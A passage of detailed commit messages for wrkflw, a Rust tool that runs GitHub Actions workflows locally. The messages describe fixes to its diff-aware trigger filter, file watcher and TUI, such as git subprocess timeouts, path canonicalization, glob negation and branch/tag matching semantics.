compile `!release/old` into a pattern that matches the string
`!release/old` and *nothing else*. The exclusion got silently
dropped and the workflow happily triggered on `release/old`.
Route those into the `*_ignore` lists at parse time, support
the `!!literal` escape, and reject mixing inline `!` with a
dedicated `*-ignore` key (GHA itself rejects that). Four new
tests cover it.
Second silent lie: `get_default_diff_base` fell back to the
empty-tree SHA when no better base could be detected, which
made `git diff` list *every tracked file* as changed. The
"filter" then matched everything — the log warning was the
only hint. Make it return an error and let the CLI tell the
user to pass `--diff-base` explicitly. A filter that can't
tell you what it's filtering is worse than no filter.
While at it, wrap every git subprocess in a 10s
`tokio::time::timeout` so a hung git (network fs, credential
prompt, corrupt repo) can't wedge the watch loop forever. And
drop the redundant `git diff --cached HEAD` pass — plain
`git diff HEAD` already covers staged + unstaged + deleted.
It was doing nothing but spawning a second process.
Third problem was the watch loop itself. `collect_workflow_files`
ran `read_dir` synchronously *inside* the async run loop on
every cycle, and the per-cycle canonicalize pass called
`std::fs::canonicalize` on every changed path without ever
hopping onto a blocking thread. On a branch switch touching
thousands of files this stalls the reactor. Move both onto
`spawn_blocking`. Also rewrote `should_ignore_path` to walk
`rel.parent().components()` directly instead of collecting
into a `Vec<Component>` — it runs on every notify event, so
the allocation was genuinely wasteful.
The doc comment on `run()` claimed the callback "will not
stall the async watch loop" because it ran on `spawn_blocking`.
That's misleading — the loop awaits the spawned task, so the
*next* cycle doesn't start until the callback returns. Rewrote
it to describe the actual behavior (events accumulate in the
debouncer during the callback; keep it fast).
While I was in the UI crate, the diff-filter toggle was
spawning a raw OS thread and building a fresh
`current_thread` tokio runtime on it — inside a TUI that's
*already* running on a tokio runtime. This is the kind of
thing that looks fine until you try to debug it. Use
`tokio::task::spawn` on the ambient runtime and push the
workflow-parsing loop onto `spawn_blocking`. Same amount of
concurrency, none of the nested-runtime weirdness.
Also: the TUI hardcodes `push` as the simulated event but
never told the user. A workflow with `on: pull_request` would
show up as SKIPPED and the user had no idea why. Surface it
in the block title as `[DIFF: push]` and mention it in the
toggle log. Extracted to a `const` on `App` so a future event
selector is plumbing-only.
Minor cleanups: consistent `Error:` prefixes in the CLI
prefilter (was mixing "Warning: Failed" with `exit(1)` which
is just confusing), and dropped the now-unused
`wrkflw-logging` dep from `trigger-filter`.
All workspace tests pass, clippy is clean.
* fix(watcher,trigger-filter,ui): plug deleted-file + detached-HEAD holes and kill TUI foot-guns
A principal-engineer review of this branch turned up a pile of
correctness bugs and UX foot-guns that were all individually small
but collectively embarrassing. Let's fix them.
The nastiest one: when a file was deleted, `canonicalize` would fail
on the missing target, the fallback was the raw path from notify, and
on macOS (`/private/var` vs `/var`) or any symlinked working tree the
subsequent `strip_prefix(repo_root)` would drop the event on the
floor. So `rm src/main.rs` would *silently* fail to trigger any
workflow with `paths: [src/**]`. Which — in a tool whose entire point
is "run the workflows for what actually changed" — is not great.
Fixed by walking back to the nearest canonicalizable ancestor and
re-joining the missing tail. It's not pretty, but it's correct, and
it keeps deletions on the happy path.
While at it:
- `should_ignore_path` used to iterate the *absolute* path
components when `strip_prefix` failed, which means a perfectly
innocent `/home/alice/target-acquisition/file.rs` would match the
`target` ignore entry. Now we just refuse to filter anything that
isn't under the watch root. Please don't have directories named
after cargo internals outside your repo, but if you do, we won't
punish you for it.
- `get_current_branch` was returning the literal string `"HEAD"` in
detached-HEAD state, because that's what `git rev-parse
--abbrev-ref HEAD` prints. Any workflow with `branches: [HEAD]`
would then "match" in detached state. Signature is now
`Result<Option<String>, _>`, callers `.ok().flatten()`.
- Notify events are now filtered by kind. Access, metadata, Any,
Other are dropped; only Create, Remove, Modify::Data,
Modify::Name make it to the debouncer. A `git checkout` firing a
thousand rename events would previously blow through
MAX_SETTLE_ROUNDS mid-burst. It still might, but at least we're
not also counting every atime update.
- The run() callback is now fire-and-forget. Previously the watch
loop awaited `spawn_blocking(cb).await`, so a slow reporter (file
sink, Slack webhook, whatever comes next) would stall the next
cycle. Documented as "keep it fast" is not a real defense.
On the TUI side, the diff-filter key (`d`) had three separate
problems.
First, the event was a hardcoded `const DIFF_FILTER_EVENT = "push"`.
Users whose main workflow is `pull_request` would press `d`, see
every single workflow reported as SKIPPED, and file a bug. It's now
a field (`App::diff_filter_event`) so a future event selector is a
data-flow change and not a public API churn.
Second, rapid toggles leaked background tasks. Each press spawned a
fresh git + parse-every-workflow task and just dropped the previous
channel. Now we hold a `JoinHandle` and `abort()` the previous task
before starting a new one.
Third, when `auto_detect_context_default_base` errored (fresh repo,
no default branch, whatever), the UI silently showed every workflow
as None and the summary line said "0/N workflows would trigger" —
with *no* indication that anything had failed. The background task
now returns a `DiffFilterOutcome::{Success, Failure}` and the
failure reason gets pushed into the TUI log.
Also:
- Status bar default hint lost `t trigger` when `d diff` was added.
The `t` keybinding still worked, only discoverability was gone.
Restored.
- Workflows-tab title now reads the dynamic `diff_filter_event`
field instead of the const.
Structural cleanup that was overdue anyway:
- Introduced `WatcherConfig` builder. `WorkflowWatcher::new` already
had eight parameters and a `#[allow(clippy::too_many_arguments)]`
— the next knob was going to push it past ten. The old positional
constructor is kept as a legacy forwarder so the CLI call site
doesn't have to change in the same commit.
- Split `WorkflowWatcher::run` into `refresh_trigger_cache` and
`canonicalize_changed_paths` helpers. The loop was 190 lines of
five concerns inline and completely untestable without spinning
up a real notify watcher.
- New `wrkflw_trigger_filter::load_trigger_config(path)` helper
consolidates read + parse + compile globs. The watcher, the TUI
diff evaluator, and the `run` CLI prefilter now all go through
the same function, so they fail identically on the same broken
file instead of each printing its own flavor of error.
- `parser::resolve_include_and_ignore` replaces 40 lines of near-
identical copy-paste across `branches`/`tags`/`paths`. Having
the same bug in three places is not my idea of redundancy.
- `wrkflw run` prefilter now roots git operations at the repo root
via `find_repo_root()`, matching what the watcher already does.
Consistent behavior when invoked from a subdirectory.
Tests: 12 new tests covering deleted-file canonicalization, event-
kind filtering, detached HEAD, diff-base error path, and the
failure-reporting path in the TUI. Tempfile-backed git tests for
`get_changed_files`, `get_default_diff_base`, and
`get_current_branch`. Regression test for the absolute-path leak in
`should_ignore_path`. 104 tests total across the three crates, all
green, clippy clean.
* fix(watcher,trigger-filter,ui,wrkflw): plug stale cache, silent parse failures, and reactor stalls
- watcher: refresh_trigger_cache compared raw notify paths (absolute,
OS-canonicalized) against read_dir paths (relative), so the
"this workflow file was edited, reparse it" branch was dead code and
watch mode served stale parsed configs forever after the first edit.
Canonicalize both sides into the same form before set membership.
- watcher: refresh_trigger_cache ran sync file I/O on the reactor.
Move it onto a spawn_blocking thread via a new async wrapper; keep
the sync helper as a free function so unit tests don't need a runtime.
- ui: evaluate_diff_filter dropped parse failures via .filter_map(.. .ok()),
leaving users with N workflows showing as "-" and no signal that
their YAML was broken. Capture failures into a new DiffFilterReport
and surface each one in the log pane.
- ui: evaluate_diff_filter ran git helpers with cwd: None, so the TUI
evaluated against whatever directory the user happened to be in
rather than the discovered repo root. Plumb find_repo_root() through.
- trigger-filter: validate_ref_name accepted '..', git's range syntax,
which slipped through into format!("{base}..{head}") interpolation
and produced confusing three-dot errors. Reject it explicitly.
- trigger-filter: move find_repo_root from watcher into trigger-filter
(the right home for our git shell-outs); watcher re-exports it for
source compat.
- wrkflw,watcher: migrate the CLI off the legacy WorkflowWatcher::new
positional ctor to the WatcherConfig builder, then delete the legacy
ctor and the unused filter_workflows API.
* fix(trigger-filter,watcher,wrkflw): plug git zombie + watcher panic + silent filter holes
PR review on the diff-aware/watch branch turned up six issues that
either silently lie to the user or quietly degrade the watch loop
over time. None of them blow up immediately, which is precisely why
they're worth fixing before this lands.
It turns out the 10s `tokio::time::timeout` around every git
subprocess does *nothing* for the failure mode it was built for. A
hung child (NFS stall, credential prompt, corrupt repo) keeps
running after the timeout fires because `tokio::process::Command`
does not enable `kill_on_drop` by default — the future just gets
dropped and the zombie keeps consuming a process slot. On a long-
running watch session against a flaky mount that's exactly how you
end up with hundreds of zombie `git` processes. `kill_on_drop(true)`
on `git_cmd`. One line. Should have been there from the start.
The parser was happy to accept `paths:` + `paths-ignore:` (and the
branches/tags equivalents) on the same event. GitHub Actions rejects
that combination at upload time, so users could iterate locally
against semantics that would later fail in production. Same crate,
`extract_string_list` was silently dropping non-string list entries
via `filter_map(... .as_str())` — a typo like `paths: [{src: foo}]`
yielded an empty list, which then matched everything. The exact
"silently lying about which workflows would run" failure mode the
rest of this branch is built to prevent. Both now surface as
`ParseError` with the offending `event.key[idx]` location.
`auto_detect_context` collapsed a real `git rev-parse` failure to
`branch: None` via `.ok().flatten()`, which made a permission denied
on `.git/HEAD` look identical to a clean detached checkout. The
detached-HEAD path already returns `Ok(None)` from
`get_current_branch`, so the fix is just to drop the `.ok().flatten()`
and let `?` propagate real errors.
The watcher had two ways to silently brick itself. First, when
`context_from_changed_files` errored, it fell back to a context
with `branch: None` and kept going — every `branches:`-filtered
workflow then deterministically rejected for the rest of the session
while the user just saw "0 triggered" forever. Now the cycle short-
circuits, attaches the reason to a new `WatchEvent::error` field,
and the CLI surfaces it. Second, a panic from the executor would
unwind through `buffer_unordered` and kill the entire watch loop —
one rogue workflow takes down the session for everything. I wanted
to use \`tokio::spawn\` for isolation, but the executor's
\`dyn ContainerRuntime\` is not \`Sync\` so the future is not \`Send\`.
\`AssertUnwindSafe(...).catch_unwind()\` from \`futures\` works on the
local future, doesn't require \`Send\`, and gives us the same
"contain it, log it, keep going" behavior.
While at it: cache the canonical workflow path inside each trigger
cache entry so refresh stops re-canonicalizing every workflow on
every cycle (one \`lstat\` walk per file per cycle adds up on a
network mount); drop the no-op \`WorkflowWatcher\` accessor methods
that were pretending to be source-compat shims on a brand-new file;
and split the 130-line, 8-arg \`run_trigger_prefilter_or_exit\` in
main.rs into a \`PrefilterRequest\` struct + two helpers so the
\`#[allow(clippy::too_many_arguments)]\` can go away.
Tests cover all of it: parser combo-rejection (paths/branches/tags),
non-string entry rejection in both \`paths:\` and \`types:\`, the null-
is-empty negative case, canonical-path memoization across two
refresh cycles, and a structural test that
\`AssertUnwindSafe.catch_unwind\` actually classifies a panicking
future as \`Err\` so the watcher's match arm fires. Existing
\`parse_mapping_with_tags\` rewritten to use inline \`!\`-negation
because the old shape now violates the rule it asserts against.
\`cargo test --workspace\`: zero failures. clippy + fmt clean.
* fix(trigger-filter,watcher,ui): kill silent failures and dead code
found in review
A principal-engineer-style review of the diff-aware-execution branch
turned up a small pile of paper cuts. None of them are catastrophic
on their own, but together they're the kind of "everything looks
fine, why is nothing triggering?" failure mode this entire feature
is supposed to *prevent*.
The main offender lives in `extract_glob_list`. It carried a
`compiled.source = display_src;` reassignment with a comment claiming
it preserved the human-visible source for the `!!` escape — except
`pattern_src` and `display_src` are equal in every branch, and
`GlobPattern::new` already wrote `pattern_src` into `compiled.source`
on the line above. So the assignment did nothing, and the comment
lied about it. Collapse the two variables into one `pattern_str`
and delete the dead write. While at it, document the greedy `!!`
behavior properly and pin the `!!!foo` triple-bang case with a
test, since GHA's spec doesn't cover it and we *will* refactor this
function again someday.
The TUI's `toggle_diff_filter` was calling `find_repo_root()`
synchronously on the UI thread. That's a `git rev-parse
--show-toplevel` subprocess. Microseconds on local disk, an
*actual hitch* on a network mount, every single toggle. Move it
into `spawn_blocking` inside the spawned task where it belongs.
`evaluate_and_execute` was also doing two pointless `git`
subprocess calls per cycle when there were zero parseable
workflows. Short-circuit on `configs.is_empty()` and stop paying
for context we'll never use.
While I was in there:
- `canonicalize_changed_paths` used to `filter_map(... .ok())`
away any path it couldn't strip-prefix to the repo root.
Notify *should* never deliver one of those, but if it does,
silently dropping the event is exactly the failure mode this
feature exists to kill. Log the dropped path under `--verbose`.
- `get_default_diff_base` only stripped the `origin/` prefix
from `git symbolic-ref --short` output. If `--short` ever
fails to apply (older git, weird vendor, who knows), the
output is `refs/remotes/origin/main` and the candidate name
ends up wrong. Strip both forms.
- `get_changed_files`'s doc claimed "covers staged + unstaged
+ committed-on-branch." That's *almost* true, but the
modify-then-stage-then-revert-in-WT edge case is genuinely
invisible to `git diff <base>`. Don't promise things we can't
deliver — the trigger filter is an approximation, not a full
index audit.
- `explain_filter_failure` now mentions an empty change set when
a `paths:` filter rejects, so the user who passed `--event
push` without `--diff` gets a directly actionable hint instead
of a `paths: ["src/**"]` dump and a furrowed brow.
- `WorkflowWatcher::run` is an unbounded `loop {}` with no
cancellation path. The CLI fakes graceful shutdown by calling
`process::exit(0)` from a Ctrl+C handler. That works for the
CLI, but anyone embedding this in a daemon or test harness is
going to be unhappy. Document the limitation loudly so the
next person knows it's a known follow-up rather than an
oversight.
- The `JoinHandle::abort` in `toggle_diff_filter` doesn't
actually cancel anything — abort only signals at await
points, and the git futures inside the task may keep running.
Soften the doc to "no longer observed" instead of overstating
the guarantee.
None of this is glamorous. The bias of this entire branch has
been "fail loud, don't lie about what's running," and this just
finishes the cleanup the review surfaced.
Build clean, all 71 trigger-filter / 21 watcher / 19 ui tests
pass, no clippy warnings.
* fix(trigger-filter,watcher,ui,wrkflw): kill five more silent-failure holes from review
A principal-engineer review of the diff-aware/watch branch turned up
five places where this PR was still doing the exact thing the rest of
the branch was built to stop doing: failing quietly. Let's fix them.
`merge_unique` in trigger-filter built a `seen` set from `into` and
then never updated it inside the loop, so duplicates *within* `more`
itself happily slipped through. The function name is a contract — it
just wasn't being honored. Switch to `HashSet::insert`'s "was new"
return so each entry costs one lookup, not two, and add the obvious
regression test.
The watcher's notify callback was the next offender: a stray
`if let Ok(event) = res` swallowed every `notify::Error` — queue
overflow, inotify watch budget exhaustion, kernel disconnects, the
lot. The user gets a cheerful "watching..." banner while the loop is
effectively dead. Log the errors as warnings instead. While at it,
`canonicalize_changed_paths` was doing the same trick with
`unwrap_or_default` on its `JoinError`, mirroring nothing the
neighboring `refresh_trigger_cache_async` was doing. Made them
consistent.
The TUI diff filter had a more subtle one. `toggle_diff_filter`
aborts the previous in-flight evaluation on rapid toggles by dropping
the receiver, which makes the *next* `check_diff_filter_results`
tick see `Disconnected` — and unconditionally log "Diff filter:
evaluation failed". Telling the user their action failed when *they*
caused the disconnect is not great. Add a `diff_filter_aborted`
flag, arm it only when there was actually something to abort, and
clear it when consumed. Genuine task panics still get logged loudly.
And finally, `wrkflw run`'s prefilter was calling
`load_trigger_config` directly from an async fn, despite the
library's own docs saying "wrap in spawn_blocking or call from a
blocking context." The watcher and TUI both already do the right
thing here; the CLI was the odd one out. Drifting on this is
*exactly* how the silent-failure holes accumulated in the first
place, so move it onto the blocking pool.
Tests added for each: merge_unique dedup-within-more, the abort-flag
arming and consumption, and a "real disconnect still gets logged"
companion. trigger-filter 73/73, watcher 21/21, ui 21/21,
wrkflw 3/3, clippy clean.
* fix(trigger-filter,watcher,ui,wrkflw): plug another round of silent-failure holes from review
Another review pass on the diff-aware/watch feature, another batch
of "this thing was lying to the user." Same theme as the previous
five rounds, but the failure modes here are louder and harder to
recover from once they bite, so they go in their own commit.
The TUI's `diff_filter_aborted` flag was a footgun. It got armed
when a toggle aborted an in-flight evaluation, but on the OFF path
the next tick observed `rx is None`, returned early, and never
cleared the flag. The *next* toggle ON spawned a fresh task with a
fresh receiver — and inherited the stale flag. So if that fresh
task genuinely failed, the resulting `Disconnected` was treated as
a self-inflicted abort and silently swallowed. Exactly the failure
mode this whole feature has been built to prevent. Clear the flag
at the start of every new evaluation and pin it with a regression
test that drives the full ON → OFF → tick → ON → fail sequence.
The watcher's `is_relevant_event_kind` had a catch-all `Modify(_)
=> false` that dropped `Modify(Any)` events. It turns out kqueue
(FreeBSD, some macOS configurations) and notify's `PollWatcher`
fallback emit `Modify(Any)` for content changes when the underlying
API can't distinguish data from metadata. So the watcher worked
beautifully on Linux inotify and macOS FSEvents and was *completely
silent* on the other backends. Make the match exhaustive on
`ModifyKind` (no catch-all) so future enum additions surface as a
compile error instead of getting routed to "drop", and treat
`Modify(Any)` as relevant.
The watcher's repo-root canonicalization fallback was the worst of
the three. When `canonicalize` failed, the previous code logged a
warning and continued with the raw path. On macOS that means every
notify event arrives as `/private/var/...`, every `strip_prefix`
against the non-canonical `/var/...` rejects, and the user sees
"Watching..." forever with zero workflows ever firing. A watcher
that *looks* alive but never matches a single event is the absolute
worst possible failure mode for this feature. Make it fatal at
startup. If you can't canonicalize the repo root, you don't get a
watcher.
While at it: stamp `--activity-type` through all three integration
points so workflows with `pull_request: { types: [...] }` filters
actually work in the TUI, the watcher, AND the CLI prefilter
(previously only the CLI bothered, and even then only after the
last round of fixes); make `--diff-base` optional on the run
command so the smart auto-detect (origin/HEAD → main → master →
HEAD~1) is actually reachable instead of being shadowed by a
`default_value = "HEAD"` that silently restricted every `--diff`
invocation to uncommitted-only changes; add an info log when
`get_default_diff_base` falls back to HEAD because the working
tree is dirty, since "I have WIP edits, why is `--diff` reporting
nothing triggered?" was a guaranteed support question; extract
`load_trigger_configs` into the trigger-filter crate so the TUI
and watcher stop maintaining near-duplicate parse-and-partition
loops; tighten the activity-type diagnostic to point at the actual
CLI flag instead of a tautology ("requires one"); warn loudly when
a workflow panics inside the watch loop's `catch_unwind` that the
executor may have left containers, tempdirs, or child processes
uncleaned, because a silent panic-recovery on a long-running watch
session is how you end up with `docker ps -a` looking like a
graveyard; and tune `MAX_SETTLE_ROUNDS` from 10 down to 3 so a
sustained `cargo build` can't delay a debounce drain by 5s while
the user wonders if the watcher hung.
Tests cover all three high-priority bugs explicitly. The
aborted-flag test in particular drives the *exact* sequence the
old code got wrong, because the only thing more embarrassing than
a silent-failure hole in a "no more silent failures" feature is
shipping the same failure mode again three weeks later.
* fix(trigger-filter,watcher): plug three silent-failure holes
Review pass turned up three more places where the trigger filter and
watcher would quietly do the wrong thing instead of telling the user
what was going on. Let's fix that.
First: `parse_events` for the `on: [push, pull_request]` sequence
form was silently dropping non-string entries. A typo like
`on: [push, {pull_request: {branches: [main]}}]` collapsed to
`on: [push]` and the pull_request filter *never applied*. The rest
of the parser has been rejecting this kind of nonsense via
`extract_string_list` for a while — the sequence path just never
got the memo. Now it errors with the offending index and kind, same
as everywhere else.
Second: `explain_filter_failure` was building its branch-mismatch
diagnostic from `filter.branches` only, completely ignoring
`branches_ignore`. A workflow with ONLY `branches-ignore: [main]`
running on `main` rendered as `branch 'main' did not match []` —
factually correct, totally useless. Combine both lists with
`!`-prefixed ignore entries so the diagnostic round-trips to the
surface syntax the user actually wrote. Same treatment for tags,
which had the identical bug.
Third: the watcher's per-cycle `collect_workflow_files` rescan was
swallowing errors with `if let Ok(refreshed) = ...` and silently
reusing the previous snapshot forever. Not wrong — the watch loop
*must* continue on transient failures — but silently falling back
to a stale list with zero diagnostic is exactly the silent-skip
pattern the rest of this PR has been plugging. Log at debug level
so a `--verbose` run leaves a trail.
Regression tests for all three. `cargo test` on the two touched
crates: 101 passed, 0 failed.
* fix(trigger-filter,watcher,wrkflw,ui): plug GHA divergence and CLI foot-guns from review
It turns out the path matcher had a "helpful" fallback that tried the
bare filename when a pattern had no slash in it. Neat trick, except
it's not what GitHub Actions does. `*.rs` would match `src/main.rs`
locally and then silently fail to match the same file on GHA, which
is the single worst outcome for a trigger filter whose entire job is
predicting what the real runner will do. Rip it out. Users who want
"any .rs file anywhere" write `**/*.rs` — that's the GHA idiom and
always has been. Pin the new behavior with a test so nobody resurrects
the fallback during a well-meaning refactor.
While at it, a few CLI foot-guns the same review turned up.
`find_repo_root()` shells out to `git rev-parse --show-toplevel`
synchronously and is *not* covered by `GIT_COMMAND_TIMEOUT` — so a
hung git (credential prompt, stuck NFS mount, corrupt repo) would
cheerfully freeze the tokio reactor on `wrkflw run --diff` and
`wrkflw watch`. The TUI already wrapped this call in `spawn_blocking`;
the CLI just didn't. Fix both call sites.
`wrkflw run --diff .gitlab-ci.yml` ran the GitHub-only trigger
prefilter first and then dumped a confusing "Error parsing workflow"
from deep in the YAML parser. Detect GitLab before the prefilter and
bail out with a message that actually tells the user what went wrong.
`max_concurrency` had a floor of 1 but no ceiling, so
\`--max-concurrency 1000000\` was happily accepted. Each concurrent
workflow carries executor state — containers, tempdirs, child
processes — so unbounded values trivially OOM the host with no
helpful signal. Clamp to 256 and warn loudly on the way down.
The watch loop fire-and-forgets the reporter callback via
\`spawn_blocking\` and then drops the JoinHandle. A panicking callback
vanished into tokio's default panic reporter with zero watch-loop
signal, which is exactly the silent-failure mode this whole PR has
been plugging. Supervisor task now awaits the handle and logs any
panic payload via \`wrkflw_logging::error\`. Not great that the
reporter type still invites \`Fn(WatchEvent)\` directly, but at least
a broken reporter is loud now.
Also: the TUI diff-filter toggle used to pay for two git subprocess
calls even when the workflow list was empty — mirror the watcher's
\`configs.is_empty()\` short-circuit so an empty toggle is free. And
dedup the branches/tags formatting in \`explain_filter_failure\`
behind a \`combined_pattern_sources\` helper so a future diagnostic
tweak can't make the two arms drift apart again.
* fix(trigger-filter,watcher): stop git from stealing TTY and fix symlink ignore hole
Another pass over the PR turned up two ugly ones plus a handful of
smaller silent-failure holes that had been sitting there in plain
sight. Let's deal with all of them at once.
The headline issue: every git subprocess we spawn inherited stdin
from the parent TTY and had no `GIT_TERMINAL_PROMPT=0`. In the TUI,
which runs in raw-terminal mode, that means a backgrounded `git diff`
from the diff-filter toggle will happily consume the user's
keystrokes for the full `GIT_COMMAND_TIMEOUT` window (up to 10
seconds) while ratatui sits there wondering where its input went. On
any repo whose remote wants auth it's even worse — git's askpass
races the UI for every keypress. *This is not great.* Wire
`Stdio::null()` and `GIT_TERMINAL_PROMPT=0` into `git_cmd` so every
subprocess is fully insulated from the parent terminal, and do the
same in `find_repo_root` while we're in there.
The other ugly one: `should_ignore_path` compared events against
`repo_root_canonical` only. That happens to work on macOS because
FSEvents canonicalizes everything, but on Linux with a symlinked
working tree (`/home/alice/proj` pointing at `/mnt/work/proj`),
inotify delivers events rooted at the raw `.watch()` argument, so
`strip_prefix` against the canonical form fails for *every single
event* and the entire ignore filter goes silently dark. You end up
eating every `target/`, `node_modules/` and `.git/` write through the
debouncer. Pass both the raw and canonical forms and try each in
turn — the two regression tests pin both the Linux-symlink and the
macOS `/private/var` paths.
While at it:
- `find_repo_root` had no timeout at all. A hung git there leaks a
blocking-pool thread for the rest of the process's life. Replaced
with a hand-rolled `try_wait` poll + kill-on-deadline so we don't
need tokio in this sync path.
- `get_default_diff_base` trusted `git status` stdout without
checking `status.success()`. On a corrupted repo it would cheerfully
claim a clean tree and fall through. Check the exit code like every
other call site does.
- `parse_event_config` silently accepted non-mapping event values, so
\`on: { push: "main" }\` collapsed to "push with no filters" instead
of surfacing the typo. The one remaining silent-drop hole in a
parser that's otherwise militant about these — fixed, with a
regression test.
- `with_max_concurrency(0)` silently clamped to 1 without the warning
its upper-bound sibling emits. Symmetric now.
- Dropped a stale doc comment on `GlobPattern` that still advertised
the bare-filename fallback `path_matcher` explicitly deleted.
All 79 trigger-filter tests and all 25 watcher tests pass, including
the four new regressions (two symlink cases, the parser typo, and the
ignore-file raw/canonical asymmetry).
* fix(trigger-filter,watcher,wrkflw): plug scalability and platform holes from review
Review flagged three issues that would bite real users the moment this
ships: inotify budget exhaustion on monorepos, a per-cycle git
subprocess storm, and Windows `paths:` filters silently never matching.
Plus a handful of smaller cuts.
**inotify pruning.** `watcher.watch(root, Recursive)` expands into one
inotify watch per directory in the tree, so the recursive-on-root call
was happily registering watches on every directory inside `target/`,
`node_modules/`, and `.git/`. On any serious Rust monorepo that blows
past `fs.inotify.max_user_watches = 8192` before the user edits a
single file, at which point notify fails half-open and the watcher
looks alive but never fires. New `setup_watches()` walks the root,
registers each non-ignored child subtree recursively, and leaves the
high-churn subtrees completely un-watched. The ignore filter on the
event hot path stays too, because macOS FSEvents can still deliver
paths the walker didn't register.
**Branch/tag cache.** Every debounced cycle was shelling out to
`git rev-parse --abbrev-ref HEAD` and `git describe --exact-match
HEAD` — for information that changes on `git checkout` and `git tag`,
i.e. basically never. A 40-file save storm was 80 git spawns for no
reason. New `cached_git_state()` on `WorkflowWatcher` with a 3-second
TTL. Not cache-invalidation-on-`.git/HEAD`-event because that would
require whitelisting `.git/` back past the ignore filter and the TTL
does the same job with a quarter of the complexity.
**Windows path separators.** `canonicalize_changed_paths` handed
backslash-separated strings straight to `path_matcher`, and
`glob::Pattern` with `require_literal_separator: true` expects `/`.
So `paths: ['src/**']` silently didn't match `src\main.rs` and every
Windows user would have seen "0 triggered" with no explanation. New
`normalize_separators()` helper runs after `strip_prefix`.
While at it: `WatcherConfig::with_extra_ignore_dirs()` so users can
add `.terraform`, `coverage`, `.next`, `bazel-bin`, etc. without
waiting for us to land each one as a default. `display_workflow_path()`
renders TRIGGERED/SKIPPED labels as repo-relative instead of the
noisy absolute form. `find_repo_root_detailed()` returns a
classified error (`GitNotInstalled` / `Timeout` / `NotInRepository` /
`Other`) so `wrkflw watch` stops telling users "not inside a git
repository" when the real problem was that git wasn't on PATH or the
subprocess hung — that misdiagnosis was sending people down the
wrong fix path every time. Doc comment on `get_changed_files`
spelling out the rename-as-delete+add behavior since `paths-ignore`
users will eventually trip over it. And a pin test for
`workflow_dispatch`/`schedule`/`repository_dispatch` so a future
refactor that starts defaulting `branches:` can't silently break
manual triggers.
Cancellation token and parallel parse are still deferred — both are
larger surface changes and the review called them out as known
follow-ups. Let's not bundle them here.
* fix(trigger-filter,watcher,ui,wrkflw): fix branches+tags OR, kill silent skips from review
The big one first: a push workflow with BOTH `branches:` and `tags:`
set was being evaluated as AND. So if you had
on:
push:
branches: [main]
tags: ['v*']
the filter would never match *anything*. Branch push? tags axis is
empty (no tag on HEAD), reject. Tag push? branches axis is empty
(detached HEAD, no branch), reject. Elegant symmetry. Completely
wrong.
It turns out GitHub Actions treats that case as OR — the workflow
fires if the branch matches `branches:` OR the tag matches `tags:`.
Which is the only thing that makes sense, because a push is on a
branch *or* a tag, never both simultaneously. The previous
sequential-AND check was literally unsatisfiable for the combo case
and no test covered it, so we shipped a feature that silently
skipped an entire class of real-world workflows.
Extract `ref_filters_pass` that handles all four combinations
explicitly and pin it with four regression tests covering branch
push, tag push, miss, and `tags-ignore` exclusion. Update
`explain_filter_failure` to render "neither ref axis matched" for
the combo case so the diagnostic actually mentions both axes
instead of just one.
While at it, plug the rest of the review punch list.
Retire the `find_repo_root` Option wrapper and migrate every call
site (CLI run prefilter, CLI watch, TUI diff-filter) to
`find_repo_root_detailed`. The wrapper collapsed git-not-installed,
timeout, and not-in-repo into one Option::None, which sent users
down the wrong fix path for three of the four failure modes. The
TUI now surfaces the classified error via `DiffFilterOutcome::
Failure` instead of silently showing "0/N would trigger".
Gate the "diff base = HEAD on dirty tree" info log on a `verbose`
parameter threaded through `get_default_diff_base` and
`auto_detect_context_default_base`. The CLI opts in via its
`--verbose` flag; the TUI passes `false` so a hot-path toggle
doesn't flood the log pane on every invocation. This was a
papercut, not a bug, but it was loud.
Move `process::exit` out of `build_event_context` and its helpers.
The function now returns `Result<EventContext, String>` and the
orchestrator owns the exit policy. Helpers that call `exit` from
deep inside are untestable without spawning subprocesses, and we
were accumulating them for no good reason.
Canonicalize `WatcherConfig::workflow_dir` once in `from_config` so
the trigger cache's `HashMap<PathBuf, _>` keys are stable when the
user passes a relative or symlinked workflow directory. Not a bug
in the current CLI (which always passes an absolute path), but the
foot-gun was there for embedders and it was cheap to remove.
Introduce `ShutdownSignal` — a lightweight cancellation handle
backed by `tokio::sync::watch::channel::<bool>`. `WorkflowWatcher::
run` now takes one as a parameter and observes it via
`tokio::select!` inside the idle wait, so triggering cancellation
wakes the loop immediately instead of parking until the next fs
event. The CLI passes `ShutdownSignal::never()` because it still
relies on `process::exit` from Ctrl+C; long-lived hosts (TUI,
future daemon, tests) construct a real signal.
The first implementation of `ShutdownSignal` used `tokio::sync::
Notify` and had a nasty trigger-before-wait race: `notify_waiters()`
only wakes currently-parked tasks, so a caller that triggered
shutdown and then spawned a task that called `wait()` would park
forever. The watch-channel version stores the latest value, so a
subscriber that joins after trigger sees the fired state on the
very next `wait_for` poll. Pinned by
`wait_after_trigger_sees_triggered_state_immediately` so a future
refactor can't silently reintroduce it.
Split the 1884-line `watcher.rs` into five focused submodules with
their own tests: `ignore` (default ignore set + path filter),
`paths` (canonicalization + separator normalization +
display_workflow_path), `event_kind` (notify event classification),
`trigger_cache` (per-cycle parsing cache), and `setup`
(subtree-by-subtree watch registration). Everything is `pub(crate)`
so the public surface is exactly what `lib.rs` re-exports. Nothing
clever, just stop pretending one file is a reasonable home for
1200 lines of hot-path logic.
Add an end-to-end watcher pipeline test
(`end_to_end_pipeline_delivers_watch_event`) that spins up a
tempdir repo, starts the watcher, touches a file in a pre-existing
subtree, and asserts the callback receives a `WatchEvent` with the
changed file. Plus `run_returns_when_shutdown_signal_is_triggered_
before_any_event` to pin the cancellation interrupt path. Both
tests run under `tokio::task::LocalSet` + `spawn_local` because
`run()` is `!Send` (the executor future holds `dyn ContainerRuntime`).
Document the Ctrl+C resource-leak caveat in `wrkflw watch --help`
— a cycle in flight when the user interrupts will get killed by
the OS without running the executor's cleanup, and users who see
orphaned containers deserve to know why.
All tests green (trigger-filter 84, watcher 39, ui 22, wrkflw 3);
clippy clean.
* fix(trigger-filter,watcher,ui,wrkflw): plug the last silent-skip holes and stop sprinkling constants
Another pass over the diff-aware / watch-mode PR after review. The
recurring theme is the same one the previous 24 fix-ups have been
chasing: warn-and-proceed where we should fail loud, plus a pile
of hardcoded constants that drifted across three call sites because
nobody owned them.
It turns out `--event` without `--diff`/`--changed-files`, and
`pull_request` without `--base-branch`, were both still taking the
log-a-warning-and-run path. In a CI script the warning is invisible
and the user sees a session-long stream of "0 triggered" with no
idea why. Same shape in `get_changed_files`: when `ls-files --others`
failed (safe-directory config, transient permission glitch) we
discarded the error in an `if let Ok(_)` block and dropped every
untracked file from the changed set, silently breaking `paths:`
filters for brand-new files. Not great.
